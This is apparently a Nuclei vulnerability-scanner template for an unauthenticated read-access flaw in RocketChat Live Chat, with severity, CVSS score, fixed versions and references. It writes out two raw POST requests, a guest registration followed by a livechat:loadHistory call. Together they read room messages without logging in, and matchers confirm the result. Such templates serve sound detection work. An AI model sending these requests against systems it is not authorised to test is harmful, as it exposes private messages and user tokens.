id: rocketchat-unauth-access info: name: RocketChat Live Chat - Unauthenticated Read Access author: rojanrijal severity: high description: RocketChat Live Chat accepts invalid parameters that could potentially allow unauthenticated access to messages and user tokens. remediation: Fixed in versions 3.11, 3.10.5, 3.9.7, and 3.8.8. reference: - https://docs.rocket.chat/guides/security/security-updates - https://securifyinc.com/disclosures/rocketchat-unauthenticated-access-to-messages classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-522 metadata: max-request: 2 tags: rocketchat,unauth variables: value: "{{to_lower(rand_text_alpha(5))}}" user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com" http: - raw: - | POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/json Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"{{value}}\",\"name\":\"cve-2020-{{value}}\",\"email\":\"{{user_email}}\"}],\"id\":\"123\"}"} - | POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/json {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"{{value}}\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"} matchers-condition: and matchers: - type: word part: body words: - '"{\"msg\":\"result\",\"result\":{\"messages\"' - '"success":true' condition: and - type: status status: - 200 # digest: 4b0a0048304602210095085dc96a7cb508eefb70fb2096b11370550b5fc48bf2778a9fe85c1c1d2726022100e82787c9db9e4546b785b8bd5997137083fc5de11cfbde2b2f1b775a62ef1ce2:922c64590222798bb761d5b6d8e72950